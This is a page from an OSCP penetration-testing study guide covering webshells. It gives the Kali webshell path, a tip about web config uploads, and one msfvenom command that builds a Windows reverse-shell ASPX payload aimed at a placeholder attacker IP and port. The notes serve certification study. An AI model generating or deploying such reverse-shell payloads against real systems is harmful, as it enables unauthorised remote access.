📈
OSCP Everything
CtrlK
  • OSiNT
    • Passive Information Gathering
  • Network
    • Active Information Gathering
    • Username / Password attacks
  • WEB
    • Information Gathering
    • Exploit Searching
      • Login Page
      • Other Pages
    • Webshells
  • API
    • Information Gathering
  • Internal
    • Linux
      • Useful commands
      • Shell stabilization
      • Port Forwarding and SSH Tunneling
      • HTTP and DNS Tunneling
    • Windows
      • Useful commands
      • Port Forwarding and SSH Tunneling
  • Active Directory
    • General information
    • Information Gathering
      • Manual Information Gathering
      • Automated Information Gathering
    • Active Directory Authentication
    • Lateral Movement
  • Additional information
    • Client side attacks
    • Metasploit
    • OffSec Methodology
  • Useful Links
    • HackTricks
    • Total OSCP Guide
    • Exploit DB
    • PayloadAllTheThings
    • HTB OSCP LIKE MACHINES
  • About
    • Author
Powered by GitBook
On this page
  • Kali linux webshell path
  • Reverse shell does not work
  • Msfvenom reverse shell file creation
  1. WEB

Webshells

You can find basic information about webshells below.

Kali linux webshell path

/usr/share/webshells

Reverse shell does not work

In this case you can also use web config file upload in order to get additional information.

Msfvenom reverse shell file creation

msfvenom -p windows\shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx
PreviousOther PagesNextInformation Gathering

Last updated 1 year ago